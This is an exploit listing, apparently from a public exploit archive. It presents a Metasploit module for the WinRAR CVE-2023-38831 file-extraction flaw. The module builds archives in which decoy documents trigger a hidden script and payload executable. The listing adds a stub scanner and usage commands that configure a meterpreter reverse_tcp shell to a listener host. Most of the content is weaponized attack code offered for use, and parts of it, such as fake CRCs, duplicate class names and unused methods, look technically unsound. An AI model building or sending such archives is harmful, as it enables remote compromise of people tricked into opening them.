Share
## https://sploitus.com/exploit?id=PACKETSTORM:212187
=============================================================================================================================================
    | # Title     : WinRAR 6.22 and earlier - Logical Flaw in File ExtractionExploit Module                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.win-rar.com/                                                                                                    |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831
    
    
    [+] Summary : 
              
            This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
            allows attackers to create specially crafted ZIP archives that, when opened, execute
            arbitrary code by exploiting the file extraction logic when a user double-clicks on
            a file within the archive that has an embedded folder with the same name.
    	
    [+] POC :  
    
    ---
    
    ##
    # Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction
    # Author: indoushka
    # CVE-2023-38831 
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::FILEFORMAT
      include Msf::Exploit::EXE
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WinRAR CVE-2023-38831 Logical Flaw Exploit',
          'Description'    => %q{
            This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
            allows attackers to create specially crafted ZIP archives that, when opened, execute
            arbitrary code by exploiting the file extraction logic when a user double-clicks on
            a file within the archive that has an embedded folder with the same name.
          },
          'Author'         => [
            'indoushka',  # Metasploit module
            'E1.Coders'   # Original research
          ],
          'License'        => MSF_LICENSE,
          'References'     => [
            ['CVE', '2023-38831'],
            ['URL', 'https://www.rarlab.com/rarnew.htm'],
            ['URL', 'https://news.ycombinator.com/item?id=37135383']
          ],
          'DefaultOptions' => {
            'EXITFUNC' => 'process',
            'DisablePayloadHandler' => false
          },
          'Platform'       => 'win',
          'Arch'           => [ARCH_X86, ARCH_X64],
          'Payload'        => {
            'Space'       => 4096,
            'BadChars'    => "\x00",
            'DisableNops' => true
          },
          'Targets'        => [
            [
              'Windows Universal (RAR <= 6.22)',
              {
                'Platform' => 'win',
                'Arch' => [ARCH_X86, ARCH_X64]
              }
            ]
          ],
          'Privileged'     => false,
          'DisclosureDate' => '2023-08-23',
          'DefaultTarget'  => 0))
    
        register_options([
          OptString.new('FILENAME', [true, 'The output file name', 'exploit.rar']),
          OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']),
          OptBool.new('HIDEEXE', [true, 'Hide executable extension', true])
        ])
      end
    
      def exploit
        # Generate payload executable
        pe_payload = generate_payload_exe
        
        # Create temporary directory for exploit construction
        temp_dir = Rex::Text.rand_text_alpha(8)
        Dir.mkdir(temp_dir) rescue nil
    
        # Create decoy folder structure
        decoy_name = datastore['DECOY_NAME']
        folder_name = "#{decoy_name}\\"
        script_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd"
        exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
    
        # Build the malicious archive
        rar_content = build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
        
        # Create the final RAR file
        file_create(rar_content)
        
        print_status("Exploit archive created: #{datastore['FILENAME']}")
        print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute")
      end
    
      def build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
        rar = ""
        
        # RAR file signature
        rar << "\x52\x61\x72\x21\x1A\x07\x00"
        
        # Build file entries using RAR format
        # First: The decoy file
        rar << build_file_header(decoy_name, pe_payload.length)
        rar << pe_payload
        
        # Second: The folder (trailing backslash)
        rar << build_file_header(folder_name, 0)
        
        # Third: The script file inside the folder
        script_content = build_script_content
        rar << build_file_header(script_name, script_content.length)
        rar << script_content
        
        # Fourth: The executable inside the folder
        rar << build_file_header(exe_name, pe_payload.length)
        rar << pe_payload
        
        # End of archive
        rar << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        
        rar
      end
    
      def build_file_header(filename, file_size)
        header = ""
        
        # Header type (file header)
        header << "\x74"
        
        # Header size
        header << "\x3A\x00"
        
        # Flags (important for the exploit)
        flags = 0x8000  # Long filename
        flags |= 0x0100  # File has extended time field
        header << [flags].pack('v')
        
        # Compressed size
        header << [file_size].pack('V')
        
        # Uncompressed size
        header << [file_size].pack('V')
        
        # OS (Windows)
        header << "\x02"
        
        # File CRC (fake)
        header << "\x00\x00\x00\x00"
        
        # File time (current time)
        time = Time.now
        dos_time = ((time.year - 1980) << 25) | (time.month << 21) | (time.day << 16) | 
                   (time.hour << 11) | (time.min << 5) | (time.sec / 2)
        header << [dos_time].pack('V')
        
        # RAR version (5.0)
        header << "\x32\x00"
        
        # Method (store)
        header << "\x30"
        
        # Name size
        header << [filename.length].pack('v')
        
        # Attributes
        header << "\x20\x00\x00\x00"  # Archive attribute
        
        # File name
        header << filename
        
        # Extra data for long filename
        if filename.length > 0
          extra_size = 2 + filename.length + 1
          header << "\x01\x00"  # Extra type (long filename)
          header << [extra_size].pack('v')
          header << filename
          header << "\x00"
        end
        
        header
      end
    
      def build_script_content
        # Create a script that executes the payload
        script = "@echo off\r\n"
        script << "start \"\" \"%~dp0#{Rex::Text.rand_text_alpha(8)}.exe\"\r\n"
        script << "exit\r\n"
        script
      end
    
      # Alternative method using RubyZip for more reliable ZIP creation
      def create_zip_exploit
        require 'zip'
        
        zip_data = ""
        Zip::OutputStream.write_buffer do |zos|
          # Add decoy file
          zos.put_next_entry(datastore['DECOY_NAME'])
          zos.write(generate_payload_exe)
          
          # Add folder with trailing slash
          folder_name = "#{datastore['DECOY_NAME']}/"
          zos.put_next_entry(folder_name)
          
          # Add script inside folder
          script_name = "#{folder_name}script.cmd"
          zos.put_next_entry(script_name)
          zos.write(build_script_content)
          
          # Add executable inside folder
          exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
          zos.put_next_entry(exe_name)
          zos.write(generate_payload_exe)
        end.string
      end
    
      # Advanced: Create a more sophisticated exploit with multiple decoys
      def create_advanced_exploit
        print_status("Creating advanced WinRAR exploit...")
        
        # Use multiple file formats as decoys
        decoys = [
          "document.pdf",
          "invoice.docx", 
          "photo.jpg",
          "spreadsheet.xlsx"
        ]
        
        zip_data = ""
        Zip::OutputStream.write_buffer do |zos|
          decoys.each do |decoy|
            # Add decoy file
            zos.put_next_entry(decoy)
            zos.write(generate_payload_exe)
            
            # Add folder for this decoy
            folder_name = "#{decoy}/"
            zos.put_next_entry(folder_name)
            
            # Add payload in folder
            exe_name = "#{folder_name}payload.exe"
            zos.put_next_entry(exe_name)
            zos.write(generate_payload_exe)
            
            # Add script to trigger execution
            script_name = "#{folder_name}run.cmd"
            zos.put_next_entry(script_name)
            zos.write("@start payload.exe\r\n")
          end
        end.string
      end
    
    end
    
    
    
    ######### Auxiliary module for WinRAR vulnerability detection ############
    
    class MetasploitModule < Msf::Auxiliary
      def initialize
        super(
          'Name'        => 'WinRAR CVE-2023-38831 Vulnerability Scanner',
          'Description' => %q{
            This module scans for systems vulnerable to the WinRAR CVE-2023-38831 vulnerability
            by checking WinRAR versions and testing exploitability.
          },
          'Author'      => ['indoushka'],
          'License'     => MSF_LICENSE,
          'References'  => [
            ['CVE', '2023-38831']
          ]
        )
    
        register_options([
          OptString.new('RHOSTS', [true, 'Target address range or CIDR identifier']),
          OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
          OptString.new('SMBUSER', [false, 'The username to authenticate as']),
          OptString.new('SMBPASS', [false, 'The password for the specified username']),
          OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication'])
        ])
      end
    
      def run
        # Scan for WinRAR installations and check versions
        print_status("Scanning for vulnerable WinRAR installations...")
        
        # Implementation would connect to targets and check WinRAR versions
        # This is a simplified version - actual implementation would require
        # SMB connection and registry checks
        
        vulnerable_versions = [
          '6.22', '6.21', '6.20', '6.11', '6.10', '6.02', '6.01', '6.00',
          '5.91', '5.90', '5.80', '5.70', '5.60', '5.50', '5.40', '5.30'
        ]
        
        # For each target, check WinRAR version
        # If version <= 6.22, mark as vulnerable
      end
    end
    
    
    ################ Usage Examples:
    
    # Generate exploit with default settings
    use exploit/windows/fileformat/winrar_cve_2023_38831
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.100
    set LPORT 4444
    exploit
    
    # Generate with custom decoy name
    
    set DECOY_NAME invoice.pdf
    exploit
    
    # Generate without hiding executable
    
    set HIDEEXE false
    exploit
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================